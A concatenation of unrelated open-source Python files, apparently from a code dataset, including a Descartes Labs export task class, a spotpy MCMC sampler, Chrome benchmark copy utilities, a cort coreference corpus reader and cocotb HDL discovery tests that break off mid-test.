An export task. Accessing any attributes before the task is completed
(for example :attr:`status`) will block until the task completes.
If you want to check whether the attributes are available, use
:attr:`is_ready` which will return :const:`True` when attributes are available.
Do not create an :class:`ExportTask` yourself; it is returned by
:meth:`FeatureCollection.export
<descarteslabs.vectors.featurecollection.FeatureCollection.export>`
and :meth:`FeatureCollection.list_exports
<descarteslabs.vectors.featurecollection.FeatureCollection.list_exports>`.
"""
def __init__(self, guid, tuid=None, client=None, result_attrs=None, key=None):
if client is None:
from descarteslabs.client.services.vector import Vector # circular import
client = Vector()
super(ExportTask, self).__init__(guid, tuid, client=client)
self.export_id = tuid
self._task_result = result_attrs
self._set_key(key)
def _set_key(self, key):
if key is not None:
self.key = key
elif self._task_result is not None:
labels = self._result_attribute("labels")
if labels is not None:
self.key = labels[3]
def get_file(self, file_obj):
"""Download the exported Storage object to a local file.
:param str file_obj: A file-like object or name of file to download into.
:raises TransientResultError: If the export hasn't completed yet.
"""
if self.key is None:
raise TransientResultError()
else:
return Storage().get_file(self.key, file_obj)
def get_result(self, wait=False, timeout=None):
"""
Attempt to load the result for this export task. After returning
from this method without an exception raised, the information for
the task is available through the various properties.
:param bool wait: Whether to wait for the task to complete or raise
a :exc:`~descarteslabs.common.tasks.futuretask.TransientResultError`
if the task hasn't completed yet.
:param int timeout: How long to wait in seconds for the task to complete, or
:const:`None` to wait indefinitely.
:raises TransientResultError: When the result is not ready yet (and not waiting).
:raises ~descarteslabs.common.tasks.TimeoutError: When the timeout has been reached (if waiting and set).
"""
# We have to go through the vector service since we don't
# own the task group
if self._task_result is None:
start = time.time()
while timeout is None or (time.time() - start) < timeout:
try:
result = self.client.get_export_result(self.guid, self.tuid)
self._task_result = result.data.attributes
self._set_key(None)
except NotFoundError:
if not wait:
raise TransientResultError()
else:
break
time.sleep(self.COMPLETION_POLL_INTERVAL_SECONDS)
else:
raise TimeoutError()
@property
def result(self):
"""
Export tasks don't have a result.
:raises AttributeError: No result available
"""
raise AttributeError("Export tasks don't have a result")
def __repr__(self):
s = "ExportTask\n"
if self.ready:
s += "\tStatus: {}\n".format(self._task_result.status)
s += "\tMemory usage (MiB): {:.2f}\n".format(
self._task_result.peak_memory_usage / (1024 * 1024.0)
)
s += "\tRuntime (s): {}\n".format(self._task_result.runtime)
else:
s += "\tStatus: Pending\n"
return s
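# Usage sketch (assumption; `fc` is a hypothetical FeatureCollection and the
# file name is illustrative):
#
#   task = fc.export('my-export')            # returns an ExportTask
#   task.get_result(wait=True, timeout=600)
#   task.get_file('export_output')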
|
spotpy/algorithms/mcmc.py | cheginit/spotpy | 182 | 12634635 | # -*- coding: utf-8 -*-
'''
Copyright (c) 2018 by <NAME>
This file is part of Statistical Parameter Optimization Tool for Python(SPOTPY).
:author: <NAME>
'''
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from . import _algorithm
import numpy as np
import time
class mcmc(_algorithm):
"""
This class holds the MarkovChainMonteCarlo (MCMC) algorithm, based on:
<NAME>., <NAME>., <NAME>., <NAME>. and <NAME>. (1953)
Equation of state calculations by fast computing machines, J. Chem. Phys.
"""
def __init__(self, *args, **kwargs):
"""
Input
----------
spot_setup: class
model: function
Should be callable with a parameter combination of the parameter-function
and return an list of simulation results (as long as evaluation list)
parameter: function
When called, it should return a random parameter combination. Which can
be e.g. uniform or Gaussian
objectivefunction: function
Should return the objectivefunction for a given list of a model simulation and
observation.
evaluation: function
Should return the true values as return by the model.
dbname: str
* Name of the database where parameter, objectivefunction value and simulation results will be saved.
dbformat: str
* ram: fast suited for short sampling time. no file will be created and results are saved in an array.
* csv: A csv file will be created, which you can import afterwards.
parallel: str
* seq: Sequential sampling (default): normal iterations on one core of your CPU.
* mpi: Message Passing Interface: parallel computing on cluster PCs (recommended for Unix OS).
save_sim: boolean
* True: Simulation results will be saved
* False: Simulation results will not be saved
"""
kwargs['optimization_direction'] = 'maximize'
kwargs['algorithm_name'] = 'Markov Chain Monte Carlo (MCMC) sampler'
super(mcmc, self).__init__(*args, **kwargs)
def check_par_validity(self, par):
if len(par) == len(self.min_bound) and len(par) == len(self.max_bound):
for i in range(len(par)):
if par[i] < self.min_bound[i]:
par[i] = self.min_bound[i]
if par[i] > self.max_bound[i]:
par[i] = self.max_bound[i]
else:
print('ERROR: Bounds do not have the same length as the parameter array')
return par
def check_par_validity_reflect(self, par):
if len(par) == len(self.min_bound) and len(par) == len(self.max_bound):
for i in range(len(par)):
if par[i] < self.min_bound[i]:
par[i] = self.min_bound[i] + (self.min_bound[i]- par[i])
elif par[i] > self.max_bound[i]:
par[i] = self.max_bound[i] - (par[i] - self.max_bound[i])
# Postprocessing if reflecting jumped out of bounds
for i in range(len(par)):
if par[i] < self.min_bound[i]:
par[i] = self.min_bound[i]
if par[i] > self.max_bound[i]:
par[i] = self.max_bound[i]
else:
print('ERROR: Bounds do not have the same length as the parameter array')
return par
def get_new_proposal_vector(self,old_par):
new_par = np.random.normal(loc=old_par, scale=self.stepsizes)
#new_par = self.check_par_validity(new_par)
new_par = self.check_par_validity_reflect(new_par)
return new_par
def update_mcmc_status(self,par,like,sim,cur_chain):
self.bestpar[cur_chain]=par
self.bestlike[cur_chain]=like
self.bestsim[cur_chain]=sim
def sample(self, repetitions,nChains=1):
self.set_repetiton(repetitions)
print('Starting the MCMC algorithm with '+str(repetitions)+ ' repetitions...')
# Prepare storing MCMC chain as array of arrays.
self.nChains = int(nChains)
#Ensure initialisation of chains and database
self.burnIn = self.nChains
# define stepsize of MCMC.
self.stepsizes = self.parameter()['step'] # array of stepsizes
# Metropolis-Hastings iterations.
self.bestpar=np.array([[np.nan]*len(self.stepsizes)]*self.nChains)
self.bestlike=[[-np.inf]]*self.nChains
self.bestsim=[[np.nan]]*self.nChains
self.accepted=np.zeros(self.nChains)
self.nChainruns=[[0]]*self.nChains
self.min_bound, self.max_bound = self.parameter(
)['minbound'], self.parameter()['maxbound']
print('Initialize ', self.nChains, ' chain(s)...')
self.iter=0
param_generator = ((curChain,self.parameter()['random']) for curChain in range(int(self.nChains)))
for curChain,randompar,simulations in self.repeat(param_generator):
# A function that calculates the fitness of the run and the manages the database
like = self.postprocessing(self.iter, randompar, simulations, chains=curChain)
self.update_mcmc_status(randompar, like, simulations, curChain)
self.iter+=1
intervaltime = time.time()
print('Beginning of random walk')
# Walk through chains
while self.iter <= repetitions - self.burnIn:
param_generator = ((curChain,self.get_new_proposal_vector(self.bestpar[curChain])) for curChain in range(int(self.nChains)))
for cChain,randompar,simulations in self.repeat(param_generator):
# A function that calculates the fitness of the run and the manages the database
like = self.postprocessing(self.iter, randompar, simulations, chains=cChain)
logMetropHastRatio = np.abs(self.bestlike[cChain])/np.abs(like)
u = np.random.uniform(low=0.3, high=1)
if logMetropHastRatio>1.0 or logMetropHastRatio>u:
self.update_mcmc_status(randompar,like,simulations,cChain)
self.accepted[cChain] += 1 # monitor acceptance
self.iter+=1
# Progress bar
acttime = time.time()
#Refresh MCMC progressbar every two second
if acttime - intervaltime >= 2 and self.iter >=2:
text = '%i of %i (best like=%g)' % (
self.iter + self.burnIn, repetitions, self.status.objectivefunction_max)
print(text)
text = "Acceptance rates [%] =" +str(np.around((self.accepted)/float(((self.iter-self.burnIn)/self.nChains)),decimals=4)*100).strip('array([])')
print(text)
intervaltime = time.time()
self.final_call()
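# Usage sketch (assumption, following the docstring above; `spot_setup` is a
# user-provided setup class as in the spotpy examples):
#
#   sampler = mcmc(spot_setup(), dbname='mcmc_run', dbformat='csv')
#   sampler.sample(repetitions=5000)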
|
saas/aiops/api/aiops-server/common/log_filter.py | iuskye/SREWorks | 407 | 12634651 |
#!/usr/bin/env python
# encoding: utf-8
""" """
__author__ = 'sreworks'
import logging
from flask import request
from common import trace_id_generator
class TraceIdFilter(logging.Filter):
def filter(self, record):
try:
trace_id = request.environ.get("HTTP_TRACE_ID", "None")
if trace_id == "None":
trace_id = trace_id_generator.generate_trace_id(request.environ.get("REMOTE_ADDR"))
user = request.environ.get("HTTP_X_AUTH_USER", "None")
except Exception:
trace_id = "None"
user = "None"
finally:
record.trace_id = trace_id
record.user = user
return True
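# Usage sketch (assumption): attach the filter to a handler so that
# "%(trace_id)s" and "%(user)s" become available in the log format, e.g.
#
#   handler = logging.StreamHandler()
#   handler.addFilter(TraceIdFilter())
#   handler.setFormatter(logging.Formatter("%(trace_id)s %(user)s %(message)s"))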
|
syzygy/scripts/benchmark/chrome_utils.py | nzeh/syzygy | 343 | 12634736 |
#!python
# Copyright 2011 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utility functions for use by scripts in this directory."""
import logging
import os
import os.path
import re
import shutil
import subprocess
_LOGGER = logging.getLogger(__name__)
def Subprocess(cmd_line):
_LOGGER.info('Running command line %s', cmd_line)
return subprocess.call(cmd_line)
def RmTree(directory):
"""Silently do a recursive delete on directory."""
# shutil.rmtree can't cope with read-only files.
Subprocess(['cmd', '/c', 'rmdir', '/s', '/q', directory])
# These directories are relative to the root of the Chrome installation.
_EXPECTED_DIRS = [ 'locales', 'servers', 'extensions' ]
def _PruneDirs(dirs):
"""Removes all unwanted directories from |dirs|, in place."""
for unwanted in (d for d in dirs if d.lower() not in _EXPECTED_DIRS):
dirs.remove(unwanted)
_EXCLUDE_PATTERNS = [
# Exclude all PDBs except for chrome.exe.pdb and chrome.dll.pdb.
re.compile('^(?!(chrome[_\.](exe|dll))\.).+\.pdb$', re.I),
# Exclude all test and chrome frame programs.
re.compile('^.*(test|validate|example|sample).*$', re.I),
# Exclude all zip/archive files.
re.compile('^.+\.(7z|zip)$', re.I),
]
def _FilesToCopy(file_list):
"""Generates the filtered list of files to copy."""
for file_name in file_list:
if not any(p.match(file_name) for p in _EXCLUDE_PATTERNS):
yield file_name
def CopyChromeFiles(src_dir, tgt_dir):
"""Copy all required chrome files from src_dir to tgt_dir."""
src_dir = os.path.abspath(src_dir)
tgt_dir = os.path.abspath(tgt_dir)
if os.path.isdir(tgt_dir):
RmTree(tgt_dir)
os.makedirs(tgt_dir)
for root_dir, sub_dirs, file_list in os.walk(src_dir):
# Prune the top-level directories that we don't want to copy or descend
# into. os.walk refers to the pruned directory list if we change it in
# place, so doesn't actually descend into them.
if src_dir == root_dir:
_PruneDirs(sub_dirs)
# Create the sub-directories at the target destination.
for dir_name in sub_dirs:
src = os.path.join(root_dir, dir_name)
rel_path = os.path.relpath(src, src_dir)
tgt = os.path.join(tgt_dir, rel_path)
_LOGGER.info('Creating directory "%s".', rel_path)
os.mkdir(tgt)
# Copy files over to the target destination.
for file_name in _FilesToCopy(file_list):
src = os.path.join(root_dir, file_name)
rel_path = os.path.relpath(src, src_dir)
tgt = os.path.join(tgt_dir, rel_path)
_LOGGER.info('Copying file "%s".', rel_path)
try:
shutil.copy2(src, tgt)
except IOError:
# When run as part of the build, there may be build targets still in
# flight that we don't depend on and can't copy (because they're opened
# exclusively by the build process). Let's assume that all the files we
# want will copy correctly, ignore the exception, and hope for the best
# on the other side.
_LOGGER.warn('Skipped file "%s".', rel_path)
|
pyannote/audio/pipeline/speech_turn_clustering.py | avramandrei/pyannote-audio | 1,543 | 12634740 | #!/usr/bin/env python
# encoding: utf-8
# The MIT License (MIT)
# Copyright (c) 2018-2020 CNRS
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# AUTHORS
# <NAME> - http://herve.niderb.fr
import numpy as np
from typing import Optional
from pyannote.core import Annotation
from pyannote.core import Timeline
from pyannote.core.utils.numpy import one_hot_decoding
from pyannote.pipeline import Pipeline
from pyannote.audio.features import Precomputed
from pyannote.pipeline.blocks.clustering import HierarchicalAgglomerativeClustering
from pyannote.pipeline.blocks.clustering import AffinityPropagationClustering
from .utils import assert_string_labels
from pyannote.audio.features.wrapper import Wrapper, Wrappable
class SpeechTurnClustering(Pipeline):
"""Speech turn clustering
Parameters
----------
embedding : Wrappable, optional
Describes how raw speaker embeddings should be obtained.
See pyannote.audio.features.wrapper.Wrapper documentation for details.
Defaults to "@emb" that indicates that protocol files provide
the scores in the "emb" key.
metric : {'euclidean', 'cosine', 'angular'}, optional
Metric used for comparing embeddings. Defaults to 'cosine'.
method : {'pool', 'affinity_propagation'}
Set method used for clustering. "pool" stands for agglomerative
hierarchical clustering with embedding pooling. "affinity_propagation"
is for clustering based on affinity propagation. Defaults to "pool".
window_wise : `bool`, optional
Set `window_wise` to True to apply clustering on embeddings extracted
using the built-in sliding window. Defaults to applying clustering at
speech turn level (one average embedding per speech turn).
"""
def __init__(
self,
embedding: Wrappable = None,
metric: Optional[str] = "cosine",
method: Optional[str] = "pool",
window_wise: Optional[bool] = False,
):
super().__init__()
if embedding is None:
embedding = "@emb"
self.embedding = embedding
self._embedding = Wrapper(self.embedding)
self.metric = metric
self.method = method
if self.method == "affinity_propagation":
self.clustering = AffinityPropagationClustering(metric=self.metric)
# sklearn documentation: Preferences for each point - points with
# larger values of preferences are more likely to be chosen as
# exemplars. The number of exemplars, ie of clusters, is influenced by
# the input preferences value. If the preferences are not passed as
# arguments, they will be set to the median of the input similarities.
# NOTE one could set the preference value of each speech turn
# according to their duration. longer speech turns are expected to
# have more accurate embeddings, therefore should be prefered for
# exemplars
else:
self.clustering = HierarchicalAgglomerativeClustering(
method=self.method, metric=self.metric, use_threshold=True
)
self.window_wise = window_wise
def _window_level(self, current_file: dict, speech_regions: Timeline) -> Annotation:
"""Apply clustering at window level
Parameters
----------
current_file : `dict`
File as provided by a pyannote.database protocol.
speech_regions : `Timeline`
Speech regions.
Returns
-------
hypothesis : `pyannote.core.Annotation`
Clustering result.
"""
# load embeddings
embedding = self._embedding(current_file)
window = embedding.sliding_window
# extract and stack embeddings of speech regions
X = np.vstack(
[
embedding.crop(segment, mode="center", fixed=segment.duration)
for segment in speech_regions
]
)
# apply clustering
y_pred = self.clustering(X)
# reconstruct
y = np.zeros(len(embedding), dtype=np.int8)
# n = total number of "speech" embeddings
# s_pred = current position in y_pred
s_pred, n = 0, len(y_pred)
for segment in speech_regions:
# get indices of current speech segment
((s, e),) = window.crop(
segment, mode="center", fixed=segment.duration, return_ranges=True
)
# hack for the very last segment that might overflow by 1
e_pred = min(s_pred + e - s, n - 1)
e = s + (e_pred - s_pred)
# assign y_pred to the corresponding speech regions
y[s:e] = y_pred[s_pred:e_pred]
# increment current position in y_red
s_pred += e - s
# reconstruct hypothesis
return one_hot_decoding(y, window)
def _turn_level(self, current_file: dict, speech_turns: Annotation) -> Annotation:
"""Apply clustering at speech turn level
Parameters
----------
current_file : `dict`
File as provided by a pyannote.database protocol.
speech_turns : `Annotation`
Speech turns. Should only contain `str` labels.
Returns
-------
hypothesis : `pyannote.core.Annotation`
Clustering result.
"""
assert_string_labels(speech_turns, "speech_turns")
embedding = self._embedding(current_file)
labels = speech_turns.labels()
X, clustered_labels, skipped_labels = [], [], []
for l, label in enumerate(labels):
timeline = speech_turns.label_timeline(label, copy=False)
# be more and more permissive until we have
# at least one embedding for current speech turn
for mode in ["strict", "center", "loose"]:
x = embedding.crop(timeline, mode=mode)
if len(x) > 0:
break
# skip labels so small we don't have any embedding for it
if len(x) < 1:
skipped_labels.append(label)
continue
clustered_labels.append(label)
X.append(np.mean(x, axis=0))
# apply clustering of label embeddings
clusters = self.clustering(np.vstack(X))
# map each clustered label to its cluster (between 1 and N_CLUSTERS)
mapping = {label: k for label, k in zip(clustered_labels, clusters)}
# map each skipped label to its own cluster
# (between -1 and -N_SKIPPED_LABELS)
for l, label in enumerate(skipped_labels):
mapping[label] = -(l + 1)
# do the actual mapping
return speech_turns.rename_labels(mapping=mapping)
def __call__(
self, current_file: dict, speech_turns: Optional[Annotation] = None
) -> Annotation:
"""Apply speech turn clustering
Parameters
----------
current_file : `dict`
File as provided by a pyannote.database protocol.
speech_turns : `Annotation`, optional
Speech turns. Should only contain `str` labels.
Defaults to `current_file['speech_turns']`.
Returns
-------
speech_turns : `pyannote.core.Annotation`
Clustered speech turns (or windows in case `window_wise` is True)
"""
if speech_turns is None:
speech_turns = current_file["speech_turns"]
if self.window_wise:
return self._window_level(
current_file, speech_turns.get_timeline().support()
)
return self._turn_level(current_file, speech_turns)
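# Usage sketch (assumption; the hyper-parameter names passed to instantiate()
# are illustrative and depend on the clustering block chosen above):
#
#   pipeline = SpeechTurnClustering(embedding="@emb", metric="cosine")
#   pipeline.instantiate({"clustering": {"threshold": 0.5}})
#   clustered_speech_turns = pipeline(current_file, speech_turns)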
|
examples/example_unicode.py | alexbzg/picoweb | 428 | 12634770 |
#
# This is a picoweb example showing rendering of a template
# with Unicode (UTF-8) characters.
#
import picoweb
app = picoweb.WebApp(__name__)
@app.route("/")
def index(req, resp):
yield from picoweb.start_response(resp)
data = {"chars": "абвгд", "var1": "α", "var2": "β", "var3": "γ"}
yield from app.render_template(resp, "unicode.tpl", (data,))
import ulogging as logging
logging.basicConfig(level=logging.INFO)
app.run(debug=True)
|
pywemo/ouimeaux_device/motion.py | sullivanmj/pywemo | 102 | 12634771 |
"""Representation of a WeMo Motion device."""
from . import Device
class Motion(Device):
"""Representation of a WeMo Motion device."""
|
cort/core/corpora.py | leonardoboliveira/cort | 141 | 12634777 | """ Represent and manipulate text collections as a list of documents."""
from collections import defaultdict
import multiprocessing
from cort.analysis import data_structures
from cort.core import documents
from cort.core import spans
__author__ = 'smartschat'
def from_string(string):
return documents.CoNLLDocument(string)
class Corpus:
"""Represents a text collection (a corpus) as a list of documents.
Such a text collection can also be read from data, and be supplemented with
antecedent information.
Attributes:
description(str): A human-readable description of the corpus.
documents (list(Document)): A list of CoNLL documents.
"""
def __init__(self, description, corpus_documents):
"""Construct a Corpus from a description and a list of documents.
Args:
description (str): A human-readable description of the corpus.
documents (list(Document)): A list of documents.
"""
self.description = description
self.documents = corpus_documents
def __iter__(self):
"""Return an iterator over documents in the corpus.
Returns:
An iterator over CoNLLDocuments.
"""
return iter(self.documents)
@staticmethod
def from_file(description, coref_file):
"""Construct a new corpus from a description and a file.
The file must contain documents in the format for the CoNLL shared
tasks on coreference resolution, see
http://conll.cemantix.org/2012/data.html.
Args:
description (str): A human-readable description of the corpus.
coref_file (file): A text file of documents in the CoNLL format.
Returns:
Corpus: A corpus consisting of the documents described in
coref_file
"""
if coref_file is None:
return []
document_as_strings = []
current_document = ""
for line in coref_file.readlines():
if line.startswith("#begin") and current_document != "":
document_as_strings.append(current_document)
current_document = ""
current_document += line
document_as_strings.append(current_document)
return Corpus(description, sorted([from_string(doc) for doc in
document_as_strings]))
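# Usage sketch (assumption; the file name is illustrative):
#
#   with open("dev.conll") as coref_file:
#       corpus = Corpus.from_file("dev", coref_file)
#   for doc in corpus:
#       ...  # each doc is a CoNLLDocument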
def write_to_file(self, file):
"""Write a string representation of the corpus to a file,
Args:
file (file): The file the corpus should be written to.
"""
for document in self.documents:
file.write(document.get_string_representation())
def write_antecedent_decisions_to_file(self, file):
"""Write antecedent decisions in the corpus to a file.
For the format, have a look at the documentation for
read_antecedents in this class.
Args:
file (file): The file the antecedent decisions should be written
to.
"""
for document in self.documents:
document.write_antecedent_decisions_to_file(file)
def read_antecedents(self, file):
"""Augment corpus with antecedent decisions read from a file.
The attribute annotated_mentions is overwritten by mentions read in
from the antecedents file. Input files should have one antecedent
decision per line, where entries are separated by tabs. The format is
doc_identifier (anaphor_start, anaphor_end) (ante_start, ante_end)
where
- doc_id is the identifier in the first line of a CoNLL document
after #begin document, such as (bc/cctv/00/cctv_0000); part 000
- anaphor_start is the position in the document where the anaphor
begins (counting from 0),
- anaphor_end is the position where the anaphor ends (inclusive),
- ante_start, ante_end analogously for the antecedent.
Args:
file (file): The file the antecedent decisions should be written
to.
"""
doc_identifier_to_pairs = defaultdict(list)
for line in file.readlines():
splitted = line.split("\t")
doc_id = splitted[0]
span_anaphor = splitted[1]
span_antecedent = splitted[2]
doc_identifier_to_pairs[doc_id].append(
(spans.Span.parse(span_anaphor), spans.Span.parse(
span_antecedent)))
for doc in self.documents:
pairs = sorted(doc_identifier_to_pairs[doc.identifier])
doc.get_annotated_mentions_from_antecedent_decisions(pairs)
def read_coref_decisions(self,
mention_entity_mapping,
antecedent_mapping=None):
"""Augment corpus with coreference and antecedent decisions..
Set set_id attribute and antecedent information for system mentions.
Args:
mention_entity_mapping (dict(Mention, int)): A mapping of mentions
to entity identifiers.
antecedent_mapping (dict(Mention, Mention)): A mapping of mentions
to their antecedent. Optional..
"""
for doc in self.documents:
for mention in doc.system_mentions:
if mention in mention_entity_mapping:
mention.attributes["set_id"] = \
mention_entity_mapping[mention]
if antecedent_mapping and mention in antecedent_mapping:
antecedent = antecedent_mapping[mention]
mention.attributes['antecedent'] = antecedent
mention.document.antecedent_decisions[mention.span] = \
antecedent.span
def get_antecedent_decisions(self, which_mentions="annotated"):
""" Get all antecedent decisions in this corpus.
Args:
which_mentions (str): Either "annotated" or "system". Defaults to
"system". Signals whether to consider annotated mentions or
system mentions.
Returns:
StructuredCoreferenceAnalysis: A StructuredCoreferenceAnalysis
containing all antecedent decisions. Can be accessed like a
                dict. If this is assigned to a variable ``x``, the
                decisions can be accessed via ``x[self.description][
                "decisions"]["all"]``, where ``self.description`` is the
                ``description`` attribute of the corpus (e.g. ``x["pair"][
                "decisions"]["all"]``).
"""
antecedent_decisions = {
self.description: {
"decisions": {
"all": {}
}
}
}
all_decisions = set()
for doc in self.documents:
doc_decisions = doc.get_antecedent_decisions(which_mentions)
for ana, ante in doc_decisions.items():
all_decisions.add((ana, ante))
antecedent_decisions[self.description]["decisions"]["all"] = \
data_structures.EnhancedSet(all_decisions)
return data_structures.StructuredCoreferenceAnalysis(
antecedent_decisions, {self.description: self}, None)
def are_coreferent(self, m, n):
""" Compute whether two mentions are coreferent in this corpus.
One use case of this function is when ``m`` and ``n`` belong to a
different corpus object, but you are interested in whether they are
coreferent according to the annotation present in this corpus.
Args:
m (Mention): A mention.
n (Mention): Another mention.
Returns:
True if ``m`` and ``n`` are coreferent according to the annotation
present in this corpus, False otherwise.
"""
if m.document != n.document:
return False
elif m.document not in self.documents:
return False
else:
doc = self.documents[self.documents.index(m.document)]
if m.span not in doc.spans_to_annotated_mentions or \
n.span not in doc.spans_to_annotated_mentions:
return False
m_in_this_corpus = doc.spans_to_annotated_mentions[m.span]
n_in_this_corpus = doc.spans_to_annotated_mentions[n.span]
return m_in_this_corpus.is_coreferent_with(n_in_this_corpus) |
viewflow/parsers/parse_r.py | pietervans/viewflow | 106 | 12634784 | import pathlib
import yaml
import re
from typing import Any, Dict
def parse_r(file: pathlib.Path) -> Dict[str, Any]:
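    """Parse an R task file into a task-config dict.
    Sketch of the expected layout (the YAML keys shown are illustrative, not
    required by this parser):
        # ---
        # owner: some_user
        # description: an example task
        # ---
        <R code of the task>
    The YAML block between the first two "# ---" marker lines is loaded as the
    task configuration; the remaining lines are kept as the task's R source
    under the "content" key, together with the operator type and file path.
    """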
content = file.read_text().split("\n")
l = [i for i, x in enumerate(content) if re.search(r"# ---", x)]
temp = "\n".join(content[l[0] + 1 : l[1]])
yml = re.sub(r"# ", "", temp)
task_config = yaml.safe_load(yml)
extras = {
"type": "ROperator",
"content": "\n".join(content[0 : l[0]] + content[(l[1] + 1) :]),
"task_file_path": str(file)
}
task_config.update(extras)
return task_config
|
opta/commands/init_templates/variables/name.py | riddopic/opta | 595 | 12634801 | <reponame>riddopic/opta<gh_stars>100-1000
import os
from opta.commands.init_templates.helpers import dictionary_deep_set
from opta.commands.init_templates.template import TemplateVariable
from opta.layer import Layer
def apply(d: dict, v: str) -> dict:
set_path = dictionary_deep_set(["name"])
set_path(d, v)
return d
nameVariable = TemplateVariable(
prompt="Name",
applier=apply,
validator=Layer.valid_name,
error_message="Invalid name: can only contain letters, dashes and numbers",
default_value=os.path.basename(os.getcwd()),
)
|
tests/test_cases/test_discovery/test_discovery.py | lavanyajagan/cocotb | 350 | 12634807 | <reponame>lavanyajagan/cocotb
# Copyright (c) 2013 Potential Ventures Ltd
# Copyright (c) 2013 SolarFlare Communications Inc
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of Potential Ventures Ltd,
# SolarFlare Communications Inc nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL POTENTIAL VENTURES LTD BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import pytest
import cocotb
from cocotb._sim_versions import IcarusVersion
from cocotb.binary import BinaryValue
from cocotb.handle import ConstantObject, HierarchyObject, IntegerObject, StringObject
from cocotb.triggers import Timer
# GHDL is unable to access signals in generate loops (gh-2594)
@cocotb.test(
expect_error=IndexError if cocotb.SIM_NAME.lower().startswith("ghdl") else ()
)
async def pseudo_region_access(dut):
"""Test that pseudo-regions are accessible before iteration"""
# Ensure pseudo-region lookup will fail
if len(dut._sub_handles) != 0:
dut._sub_handles = {}
dut.genblk1[0]
@cocotb.test()
async def recursive_discover(dut):
"""Discover absolutely everything in the DUT"""
def _discover(obj):
for thing in obj:
dut._log.debug("Found %s (%s)", thing._name, type(thing))
_discover(thing)
_discover(dut)
@cocotb.test()
async def discover_module_values(dut):
"""Discover everything in the DUT"""
count = 0
for thing in dut:
count += 1
assert count >= 2, "Expected to discover things in the DUT"
@cocotb.test()
async def discover_value_not_in_dut(dut):
"""Try and get a value from the DUT that is not there"""
with pytest.raises(AttributeError):
dut.fake_signal
@cocotb.test()
async def access_signal(dut):
"""Access a signal using the assignment mechanism"""
dut.stream_in_data.setimmediatevalue(1)
await Timer(1, "ns")
assert dut.stream_in_data.value.integer == 1
@cocotb.test(skip=cocotb.LANGUAGE in ["vhdl"])
async def access_type_bit_verilog(dut):
"""Access type bit in SystemVerilog"""
await Timer(1, "step")
assert dut.mybit.value == 1, "The default value was incorrect"
dut.mybit.value = 0
await Timer(1, "ns")
assert dut.mybit.value == 0, "The assigned value was incorrect"
assert dut.mybits.value == 0b11, "The default value was incorrect"
dut.mybits.value = 0b00
await Timer(1, "ns")
assert dut.mybits.value == 0b00, "The assigned value was incorrect"
assert dut.mybits_uninitialized.value == 0b00, "The default value was incorrect"
dut.mybits_uninitialized.value = 0b11
await Timer(1, "ns")
assert dut.mybits_uninitialized.value == 0b11, "The assigned value was incorrect"
@cocotb.test(skip=cocotb.LANGUAGE in ["vhdl"])
async def access_type_bit_verilog_metavalues(dut):
"""Access type bit in SystemVerilog with metavalues that the type does not support.
Note that some simulators (wrongly) allow metavalues even for bits when taking the VPI route.
The metavalues still may show up as `0` and `1` in HDL (Xcelium and Riviera).
"""
await Timer(1, "ns")
dut.mybits.value = BinaryValue("XZ")
await Timer(1, "ns")
print(dut.mybits.value.binstr)
if cocotb.SIM_NAME.lower().startswith(("icarus", "ncsim", "xmsim")):
assert (
dut.mybits.value.binstr.lower() == "xz"
), "The assigned value was not as expected"
elif cocotb.SIM_NAME.lower().startswith(("riviera",)):
assert (
dut.mybits.value.binstr.lower() == "10"
), "The assigned value was not as expected"
else:
assert (
dut.mybits.value.binstr.lower() == "00"
), "The assigned value was incorrect"
dut.mybits.value = BinaryValue("ZX")
await Timer(1, "ns")
print(dut.mybits.value.binstr)
if cocotb.SIM_NAME.lower().startswith(("icarus", "ncsim", "xmsim")):
assert (
dut.mybits.value.binstr.lower() == "zx"
), "The assigned value was not as expected"
elif cocotb.SIM_NAME.lower().startswith(("riviera",)):
assert (
